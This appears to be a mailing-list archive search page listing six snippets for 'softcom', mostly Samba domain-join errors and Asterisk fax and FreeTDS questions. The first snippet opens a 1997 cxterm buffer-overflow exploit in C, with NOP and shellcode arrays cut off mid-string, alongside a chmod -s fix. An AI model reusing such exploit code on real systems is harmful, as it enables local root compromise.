search for: softcom

Displaying 6 results from an estimated 6 matches for "softcom".

1997 May 14
4
cxterm buffer overrun
...ed below is the exploit. Quick fix? chmod -s /path/cxterm ========================================================================== /* cxterm buffer overflow exploit for Linux. This code is tested on both Slackware 3.1 and 3.2. Ming Zhang mzhang@softcom.net */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x...
2007 Jan 29
2
Rxfax and Txfax on Asterisk 1.4
> AFAIK the current recommendation is to use HylaFax with something called iaxmodem. After having been through a lot of problems with RxFax and TxFax I completely agree with this statement. Allthough the initial configuration is a bit complicated, once you have this running you'll get far better reliability. Kind regards, Ardjan Zwartjes.
2004 Nov 19
0
Net error
...th-quotas \ --with-syslog \ --with-idmap \ --with-acl-support \ --with-ldap \ --with-ads ------------------------------- The compilation works ok and I can join a domain using rpc, but if I use ads then I get ------------------------------- [root@x2scan root]# net ads join Computers -W SOFTCOM -U addtodomain addtodomain's password: [2004/11/19 14:38:07, 0] utils/net_ads.c:ads_startup(186) ads_connect: No such file or directory [root@x2scan root]# ------------------------------- Why do this error ocure ?, I have used the same options before so I am sure that it must work (that is...
2004 Nov 23
0
Strange error
Hi all. I have samba 3.0.8 running on a redhat 7.3 server, I can join a domain using rpc, but if I use ads then I get ------------------------------- [root@x2scan root]# net ads join Computers -W SOFTCOM -U addtodomain addtodomain's password: [2004/11/19 14:38:07, 0] utils/net_ads.c:ads_startup(186) ads_connect: No such file or directory [root@x2scan root]# ------------------------------- Why do this error ocure ?, I have used the same options before so I am sure that it must work (that...
2005 Jul 04
1
Asterisk 1.0.9 and FreeTDS
Hi all, I have a working 1.0.7 installation and it is recording CDR to mysql. I am using FreeTDS on the system currently to access our MS SQL 2000 server for account verification, we may use it to store CDR records there in the future. I have decided to update the installation to 1.0.9. However, during "make", I receive: make[1]: Entering directory `/usr/src/asterisk/cdr' gcc
2004 Dec 16
1
Running "net join" from web page
Hi all, i'm trying to make a linux box join a windows domain by calling "NET JOIN" from php/perl. The join works perfecly when used from the command line. I made a perl script that runs the actual command, set-uid it to root and ran it from php. Then i got this error: [2004/12/16 14:33:24, 0] libsmb/clientgen.c:cli_initialise(251) libsmb based programs must *NOT* be setuid root.